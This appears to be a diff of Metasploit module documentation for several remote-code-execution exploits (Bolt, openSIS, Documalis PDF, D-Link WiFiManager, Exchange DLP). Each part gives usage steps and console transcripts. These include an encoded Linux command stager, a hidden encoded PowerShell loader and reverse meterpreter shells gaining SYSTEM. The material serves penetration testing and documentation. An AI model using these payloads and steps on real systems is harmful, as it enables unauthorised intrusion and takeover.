+   VHOST                                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (x64)
+
+
+msf5 exploit(unix/webapp/bolt_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 172.28.128.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "qjej".
+[*] Found CSRF token: pAuS_pLAjcUd8wPjq7Xus72UE2N0P4YB8HularDy3A0
+[*] Found 1 potential token(s) for creating .php files.
+[+] Used token a5881f86a828d3810fa0fa64fb to create cojwcnuk.php.
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwcgAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/QtQwu.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/nSljj' < '/tmp/QtQwu.b64' ; chmod +x '/tmp/nSljj' ; '/tmp/nSljj' ; rm -f '/tmp/nSljj' ; rm -f '/tmp/QtQwu.b64'"]
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012516 bytes) to 172.28.128.5
+[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.5:41918) at 2020-06-28 22:39:20 -0500
+[!] No response, may have executed a blocking payload!
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+[+] Deleted file cojwcnuk.php.
+[+] Reverted user profile back to original state.
+
+meterpreter > getuid
+Server username: no-user @ ubuntu-bionic (uid=1000, gid=1000, euid=1000, egid=1000)
+meterpreter > sysinfo
+Computer     : 10.0.2.15
+OS           : Ubuntu 18.04 (Linux 4.15.0-91-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,58 @@
+## Vulnerable Application
+
+This module exploits multiple vulnerabilities in [openSIS](https://www.opensis.com/) 7.4 and prior versions which could be abused by unauthenticated attackers to execute arbitrary PHP code. It is based on these advisories:
+
+- http://karmainsecurity.com/KIS-2020-06
+- http://karmainsecurity.com/KIS-2020-07
+- http://karmainsecurity.com/KIS-2020-08
+
+The module has been successfully tested against [openSIS](https://www.opensis.com/) versions 7.3 and 7.4 running on Ubuntu. Older versions might be affected as well.
+
+Download link: https://sourceforge.net/projects/opensis-ce/files/
+
+## Verification Steps
+
+  1. Install the web application
+  2. Start msfconsole
+  3. Do: ```use unix/webapp/opensis_chain_exec```
+  4. Do: ```set RHOSTS [IP]```
+  5. Do: ```set TARGETURI [/path/to/opensis]```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+The base path to the web application (e.g. `/opensis/`). The default value is `/`.
+
+## Scenarios
+
+**openSIS 7.4 running on Ubuntu 18.04.4**
+
+```
+msf5 > use unix/webapp/opensis_chain_exec
+msf5 exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost
+msf5 exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/
+msf5 exploit(unix/webapp/opensis_chain_exec) > check 
+
+[*] Retrieving session cookie
+[*] Injecting malicious SQL into session variable
+[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
+[*] Executing PHP code by calling Bottom.php
+[+] 127.0.0.1:80 - The target is vulnerable.
+
+msf5 exploit(unix/webapp/opensis_chain_exec) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Retrieving session cookie
+[*] Injecting malicious SQL into session variable
+[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
+[*] Executing PHP code by calling Bottom.php
+[*] Sending stage (38288 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:45460) at 2020-07-01 23:31:43 +0200
+
+meterpreter > getuid 
+Server username: www-data (33)
+meterpreter > 
+```
@@ -0,0 +1,202 @@
+## Vulnerable Application
+
+  Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately
+  validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger
+  a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF
+  Editor or Documalis Free PDF Scanner software.
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: `use exploit/windows/fileformat/documalis_pdf_editor_and_scanner`
+   4. Do: `set TARGET 0` for Documalis Free PDF Editor or `set TARGET 1` for Documalis Free PDF Scanner
+   5. Do: `set payload windows/meterpreter/bind_tcp`
+   6. Do: `set RHOST [Target IP]`
+   7. Do: `set LPORT [Port to make the target host listen on]`
+   9. Do: `run`
+   10. Do: `use exploit/multi/handler`
+   11. Do: `set payload windows/meterpreter/bind_tcp`
+   12. Do: `set RHOST [Target IP]`
+   13. Do: `set LPORT [Same port as before, this will be the port the target is listening on]`
+   13. Do: `run`
+   14. Copy the generated file to the target machine
+   15. For Documalis Free PDF Editor, drag and drop the PDF to open it. For Documalis Free PDF Scanner, select the Add
+       button on the right side of the screen and then select the malicious PDF file from the file prompt.
+   16. You should get a shell as the user running either Documalis Free PDF Scanner or Documalis Free PDF
+       Editor (depending on which software was exploited).
+
+## Options
+  **FILENAME**
+  Name of the PDF file that Metasploit will generate. This will default to "msf.pdf", but can be changed.
+
+## Scenarios
+
+### Documalis Free PDF Editor v5.7.2.26 on Windows 10 x64 v2004
+```
+msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 0
+TARGET => 0
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 6655
+LPORT => 6655
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options
+
+Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   FILENAME          msf.pdf          no        The file name.
+   PDF::Encoder      ASCIIHEX         yes       Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
+   PDF::Method       DOCUMENT         yes       Select PAGE, DOCUMENT, or ANNOTATION
+   PDF::MultiFilter  1                yes       Stack multiple encodings n times
+   PDF::Obfuscate    true             yes       Whether or not we should obfuscate the output
+
+
+Payload options (windows/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6655             yes       The listen port
+   RHOST     172.26.215.55    no        The target address
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10
+
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit
+
+[+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf
+[*] Started bind TCP handler against 172.26.215.55:6655
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler
+msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(multi/handler) > set LPORT 6655
+LPORT => 6655
+msf5 exploit(multi/handler) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.26.215.55:6655
+[*] Sending stage (176195 bytes) to 172.26.215.55
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.26.215.55:6655) at 2020-07-31 17:05:06 -0500
+
+meterpreter > getuid
+Server username: DESKTOP-KUO5CML\test
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > sysinfo
+Computer        : DESKTOP-KUO5CML
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Documalis Free PDF Scanner v5.7.2.122 on Windows 10 x64 v2004
+```
+msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 1
+TARGET => 1
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 7788
+LPORT => 7788
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options
+
+Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   FILENAME          msf.pdf          no        The file name.
+   PDF::Encoder      ASCIIHEX         yes       Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
+   PDF::Method       DOCUMENT         yes       Select PAGE, DOCUMENT, or ANNOTATION
+   PDF::MultiFilter  1                yes       Stack multiple encodings n times
+   PDF::Obfuscate    true             yes       Whether or not we should obfuscate the output
+
+
+Payload options (windows/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     7788             yes       The listen port
+   RHOST     172.26.215.55    no        The target address
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10
+
+
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit
+
+[+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf
+[*] Started bind TCP handler against 172.26.215.55:7788
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler
+msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
+payload => windows/meterpreter/bind_tcp
+msf5 exploit(multi/handler) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(multi/handler) > set LPORT 7788
+LPORT => 7788
+msf5 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.26.215.55:7788
+[*] Sending stage (176195 bytes) to 172.26.215.55
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.26.215.55:7788) at 2020-07-31 17:31:35 -0500
+
+meterpreter > getuid
+Server username: DESKTOP-KUO5CML\test
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > sysinfo
+Computer        : DESKTOP-KUO5CML
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```
@@ -96,7 +96,7 @@ msf5 exploit(windows/http/desktopcentral_deserialization) > run
 [+] The target appears to be vulnerable. Desktop Central 100465 is a vulnerable build.
 [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
 [*] Powershell command length: 2502
-[*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2dwuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2dwuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
 [*] Uploading serialized payload
 [+] Successfully uploaded serialized payload
 [*] Deserializing payload
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits a PHP code injection vulnerability in D-Link Central WiFiManager CWM‑100.
+The vulnerability exists because a user-controlled cookie is passed to the `eval()` function without being
+sanitized.
+
+Because the HTTP server runs in the context of a privileged user (with a default installation),
+successful exploitation results in code execution as nt_authority\system.
+
+A vulnerable version is available at DLink's vulnerability announcement:
+- [The announcement](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
+- [ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use windows/http/dlink_central_wifimanager_rce`
+3. Do: `set RHOSTS [RHOSTS]`
+4. Check the payload options: `show options`
+5. Do: `exploit`
+6. Verify that you get a shell / meterpreter / that whatever payload you used was executed
+
+## Options
+
+No additional options
+
+## Scenarios
+
+### CWM-100 v1.03
+
+#### Getting a meterpreter session
+
+```
+msf5 exploit(windows/http/dlink_central_wifimanager_rce) > 
+msf5 exploit(windows/http/dlink_central_wifimanager_rce) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Sending stage (38288 bytes) to 192.168.1.223
+[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:1783) at 2020-08-13 14:51:09 +0200
+
+meterpreter > sysinfo
+Computer    : REVM-PC
+OS          : Windows NT REVM-PC 6.1 build 7601 (Windows 7 Professional N Edition Service Pack 1) i586
+Meterpreter : php/windows
+meterpreter > getuid 
+Server username: SYSTEM (0)
+meterpreter > pwd
+C:\Program Files (x86)\D-Link\Central WifiManager\web
+meterpreter > ls
+Listing: C:\Program Files (x86)\D-Link\Central WifiManager\web
+==============================================================
+
+Mode              Size    Type  Last modified              Name
+----              ----    ----  -------------              ----
+100666/rw-rw-rw-  177     fil   2014-09-16 16:19:18 +0200  .htaccess
+100666/rw-rw-rw-  138884  fil   2016-01-28 13:36:32 +0100  AP_Installation_utility_for_cwm.zip
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:25 +0200  CapLoginStyle
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  Common
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Conf
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  DBBackup
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:44 +0200  Lang
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Lib
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Public
+100666/rw-rw-rw-  256     fil   2014-09-16 16:19:18 +0200  README.txt
+40777/rwxrwxrwx   0       dir   2020-08-13 13:02:13 +0200  Runtime
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:27 +0200  ThinkPHP
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Tpl
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:38 +0200  captivalportal
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:36 +0200  ckeditor
+100666/rw-rw-rw-  15086   fil   2014-09-16 16:19:18 +0200  favicon.ico
+100666/rw-rw-rw-  158     fil   2014-09-16 16:19:18 +0200  index.php
+100666/rw-rw-rw-  122     fil   2015-10-29 14:17:48 +0100  redrect.php
+100666/rw-rw-rw-  211     fil   2014-09-16 16:19:18 +0200  robots.txt
+```
@@ -0,0 +1,123 @@
+## Vulnerable Application
+
+### Description
+
+This vulnerability allows remote attackers to execute arbitrary code
+on affected installations of Exchange Server. Authentication is
+required to exploit this vulnerability. Additionally, the target user
+must have the `Data Loss Prevention` role assigned and an active
+mailbox.
+
+If the user is in the `Compliance Management` or greater `Organization
+Management` role groups, then they have the `Data Loss Prevention`
+role. Since the user who installed Exchange is in the `Organization
+Management` role group, they transitively have the `Data Loss
+Prevention` role.
+
+The specific flaw exists within the processing of the `New-DlpPolicy`
+cmdlet. The issue results from the lack of proper validation of
+user-supplied template data when creating a DLP policy. An attacker
+can leverage this vulnerability to execute code in the context of
+`SYSTEM`.
+
+Tested against Exchange Server 2016 CU14 on Windows Server 2016.
+
+### Setup
+
+Set up a [vulnerable target](#targets).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+`Exchange Server 2016 and 2019 w/o KB4577352`
+
+## Options
+
+### USERNAME
+
+Set this to the OWA username.
+
+### PASSWORD
+
+Set this to the OWA password.
+
+## Scenarios
+
+### Exchange Server 2016 CU14 on Windows Server 2016
+
+```
+msf6 > use exploit/windows/http/exchange_ecp_dlp_policy
+[*] Using configured payload windows/x64/meterpreter/reverse_https
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > options
+
+Module options (exploit/windows/http/exchange_ecp_dlp_policy):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    no        OWA password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   USERNAME                    no        OWA username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_https):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The local listener hostname
+   LPORT     8443             yes       The local listener port
+   LURI                       no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Exchange Server 2016 and 2019 w/o KB4577352
+
+
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set rhosts 192.168.123.192
+rhosts => 192.168.123.192
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set username Administrator
+username => Administrator
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set password Passw0rd!
+password => Passw0rd!
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
+
+[*] Started HTTPS reverse handler on https://192.168.123.1:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. OWA is running at https://192.168.123.192/owa/
+[*] Logging in to OWA with creds Administrator:Passw0rd!
+[+] Successfully logged in to OWA
+[*] Retrieving ViewState from DLP policy creation page
+[+] Successfully retrieved ViewState
+[*] Creating custom DLP policy from malicious template
+[*] DLP policy name: Abbotstone Agricultural Property Unit Trust Data
+[*] Powershell command length: 2372
+[*] https://192.168.123.1:8443 handling request from 192.168.123.192; (UUID: rwlz4ahe) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.192:6951) at 2020-09-16 02:39:17 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-365Q2VJJS17
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : GIBSON
+Logged On Users : 8
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -103,7 +103,7 @@ msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run
 [+] The target is vulnerable. We can sign our own ViewState.
 [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
 [*] Powershell command length: 2498
